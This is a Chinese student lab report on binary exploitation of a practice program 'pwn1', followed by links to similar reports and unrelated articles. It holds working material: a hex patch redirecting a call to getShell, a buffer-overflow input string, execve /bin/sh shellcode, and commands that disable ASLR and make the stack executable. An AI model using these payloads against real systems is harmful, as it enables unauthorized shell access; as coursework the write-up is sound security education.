2018-2019-2 网络对抗技术 20165324 Exp1:PC平台逆向破解

实验:

要求:

  1. 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码(0.5分)
  2. 掌握反汇编与十六进制编程器 (0.5分)
  3. 能正确修改机器指令改变程序执行流程(0.5分)
  4. 能正确构造payload进行bof攻击(0.5分)

内容:

  1. 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数
  2. 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数
  3. 注入一个自己制作的shellcode并运行这段shellcode

基础知识:

  • 掌握汇编指令的机器码:

    1. NOP:NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(机器码:90)
    2. JNE:条件转移指令,如果不相等则跳转。(机器码:75)
    3. JE:条件转移指令,如果相等则跳转。(机器码:74)
    4. JMP:无条件转移指令。段内直接短转Jmp
    5. short(机器码:EB)段内直接近转移Jmp
    6. near(机器码:E9)段内间接转移Jmp
    7. word(机器码:FF)段间直接(远)转移Jmp
    8. far(机器码:EA)
    9. CMP:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。

实验1.1:手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。

  • objdump -d pwn1命令进行反汇编:

  1. 查看main:call 8048491 <foo>是汇编指令,这条指令将调用位于地址8048491处的foo函数;其对应机器指令为e8 d7ffffff,e8即跳转之意

    本来正常流程,此时此刻EIP的值应该是下条指令的地址,即80484ba,但如一解释e8这条指令呢,CPU就会转而执行EIP + d7ffffff这个位置的指令。d7ffffff是补码,表示-41,41=0x29,80484ba +d7ffffff=80484ba-0x29正好是8048491这个值,

    main函数调用foo,对应机器指令为e8 d7ffffff,

    那我们想让它调用getShell,只要修改d7ffffff为getShell-80484ba对应的补码就行
  2. 修改可执行文件,将其中的call指令的目标地址由d7ffffff变为c3ffffff:
  • 修改可执行文件:
  1. vim pwn1
  2. esc->:%!xxd 将显示模式切换为16进制模式
  3. 修改d7为c3

  1. :%!xxd -r 转换16进制为原格式
  2. :wq 存盘退出vim
  3. objdump -d pwn1命令反汇编看一下,call指令是否正确调用getShell:

  • 运行pwn1文件:./pwn1可得:

实验1.2:利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。

  • 我们的目标是触发函数getShell

    该可执行文件正常运行是调用函数foo,这个函数有Buffer overflow漏洞
  • 函数foo中的mov(804849a)读入字符串,但系统只预留了32字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址
  • 函数main中的call调用函数foo,同时在堆栈上压上返回地址值:80484ae
  • getShell的内存地址,通过反汇编时可以看到,即0804847d,接下来要输入字节序,11111111222222223333333344444444\x7d\x84\x04\x08。
  • 关于Perl:Perl是一门解释型语言,不需要预编译,可以在命令行上直接使用。使用输出重定向“>”将perl生成的字符串存储到文件input中。

  • 然后将input的输入,通过管道符“|”,作为pwn2的输入。

实验1.3:注入一个自己制作的shellcode并运行这段shellcode

准备条件:以下实践是在非常简单的一个预设条件下完成的:

1. 关闭堆栈保护(gcc -fno-stack-protector)
2. 关闭堆栈执行保护(execstack -s)
3. 关闭地址随机化(/proc/sys/kernel/randomize_va_space=0)
4. 在x32环境下
5. 在Linux实践环境
  • 因此修改设置如下:
apt-get install execstack //安装execstack命令
execstack -s pwn1 //设置堆栈可执行
execstack -q pwn1 //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space //查询是否关闭地址随机化
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space //查询是否关闭地址随机化

构建input_shellcode

  • 使用命令perl -e 'print "A" x 32;print "\x04\x03\x02\x01\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode注入,其中前面32个A用来填满缓冲区buf,\x04\x03\x02\x01为预留的返回地址.

寻找进程号和返回地址:

  • 打开一个终端注入这段攻击buf:(cat input_shellcode;cat) | ./pwn1

    再开另外一个终端Ctrl+Shift+T,用gdb来调试pwn3这个进程:

    ps -ef | grep pwn3命令找到pwn3的进程号是5885。
  • gdb命令启动gdb调试这个进程:
    1. attach 5885;
    2. disassemble foo命令反汇编,通过设置断点,来查看注入buf的内存地址;
    3. break *0x080484ae命令设置断点,输入c命令(continue)继续运行,同时在pwn3进程正在运行的终端敲回车,使其继续执行。再返回调试终端,使用info r esp命令查找地址;
    4. x/16x 0xffffd34c以16进制形式查看0xffffd34c地址后面16字节的内容;
    5. 注入的shellcode代码的地址应该在该ret指令地址后四个字节的位置,即0xdffff21c + 0x00000004 = 0xdffff220;
    6. 退出gdb

2018-2019-2 网络对抗技术 20165324 Exp1:PC平台逆向破解的更多相关文章

  1. 20165221 《网络对抗技术》EXP1 PC平台逆向破解

    20165221 <网络对抗技术>EXP1 PC平台逆向破解 一.实验内容 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函 ...

  2. 2018-2019-2 网络对抗技术 20165325 Exp1 PC平台逆向破解

    2018-2019-2 网络对抗技术 20165325 Exp1 PC平台逆向破解(BOF实验) 实验有三个模块: (一)直接修改程序机器指令,改变程序执行流程: (二)通过构造输入参数,造成BOF攻 ...

  3. 2018-2019-2 20165206《网络对抗技术》Exp1 PC平台逆向破解

    - 2018-2019-2 20165206<网络对抗技术>Exp1 PC平台逆向破解 - 实验任务 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:mai ...

  4. 2018-2019-2 20165317《网络对抗技术》Exp1 PC平台逆向破解

    2018-2019-2 20165317<网络对抗技术>Exp1 PC平台逆向破解 实验目的 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码 NOP:无作用,英文&quo ...

  5. 2018-2019-2 网络对抗技术 20165336 Exp1 PC平台逆向破解

    2018-2019-2 网络对抗技术 20165336 Exp1 PC平台逆向破解 1. 逆向及Bof基础实践说明 1.1 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件.该程序正常 ...

  6. 2018-2019-2 网络对抗技术 20165305 Exp1 PC平台逆向破解

    2018-2019-2 网络对抗技术 20165305 Exp1 PC平台逆向破解 实验1-1直接修改程序机器指令,改变程序执行流程 先输入objdump -d 20165305pwn2查看反汇编代码 ...

  7. 2018-2019-2 《网络对抗技术》 Exp1 PC平台逆向破解 20165215

    2018-2019-2 <网络对抗技术> Exp1 PC平台逆向破解 20165215 目录 知识点描述 实验步骤 (一)直接修改程序机器指令,改变程序执行流程 (二)通过构造输入参数,造 ...

  8. 2018-2019-2 20165316 《网络对抗技术》Exp1 PC平台逆向破解

    2018-2019-2 20165316 <网络对抗技术>Exp1 PC平台逆向破解 1 逆向及Bof基础实践说明 1.1 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件 ...

  9. 20165214 2018-2019-2 《网络对抗技术》Exp1 PC平台逆向破解 Week3

    <网络对抗技术>Exp1 PC平台逆向破解之"逆向及Bof基础实践说明" Week3 一. 实验预习 1.什么是漏洞?漏洞有什么危害? 漏洞就是在计算机硬件.软件.协议 ...

  10. 2018-2019-2 网络对抗技术 20165228 Exp1 PC平台逆向破解

    2018-2019-2 网络对抗技术 20165228 Exp1 PC平台逆向破解 实验内容及步骤 第一部分:直接修改程序机器指令,改变程序执行流程 关键:通过修改call指令跳转的地址,将原本指向被 ...

随机推荐

  1. -webkit-transition -moz-transition transition

    -webkit-transition  -moz-transition transition 可以定义动画的变化时间曲线-webkit-transition-timing-function: ease ...

  2. laravel部署常用命令

    php composer install composer dump-autoload php artisan key:generate .env 及 config/database.php里的数据库 ...

  3. 根据json对象的值替换json数组里的值

    功能: var fruitArry=[{name:'durian'},{name:'peach'},{name:'banana'},{name:'pitaya'},{name:'apple'},{na ...

  4. 使用Btrace来动态监控方法的参数和返回值

    btrace简介: btrace是一种动态跟踪分析一个运行中的Java应用程序的工具,它基于java的探针技术动态地向目标应用程序的字节码注入追踪代码(字节码追踪),这些追踪字节码追踪代码使用Java ...

  5. springMVC访问 WEB-INF 下的 jsp 和 html

    配置freemarker,记得加上jar包 <?xml version="1.0" encoding="UTF-8"?> <beans xml ...

  6. 从底层源码浅析Mybatis的SqlSessionFactory初始化过程

    目录 搭建源码环境 POM依赖 测试SQL Mybatis全局配置文件 UserMapper接口 UserMapper配置 User实体 Main方法 快速进入Debug跟踪 源码分析准备 源码分析 ...

  7. 第一次php之旅

    话说起来,我也是刚接触php不久,刚开始是因为想自己做一个从前端到后台完整的网站,所以去学后台技术,在各种语言的选择中,由于php语言的简单,易学,功能强大,开发速度快等原因,最终我选择了php! 一 ...

  8. 关注被关注表设计-UserFollowMapping

    -- ---------------------------- -- Table structure for UserFollowMapping -- ------------------------ ...

  9. tesseract .net 中使用历程

    最近在看文字识别的实例,也查询很多文章,最后还是选定开源的引擎(tesseract3.0.1) 最开始找到的是用微软Office的一个组件实现的,个人感觉不是我想要的(要开源啊才是王道) http:/ ...

  10. Mac操作技巧

    Command+Option+P+R,重置PRAM的. 官方关于重置PRAM的说明.(有助于电脑提速) 安装新版系统的时候失败,原因是下载的镜像有问题版本不对,具体是中国区暂未更新镜像,下载下来的有问 ...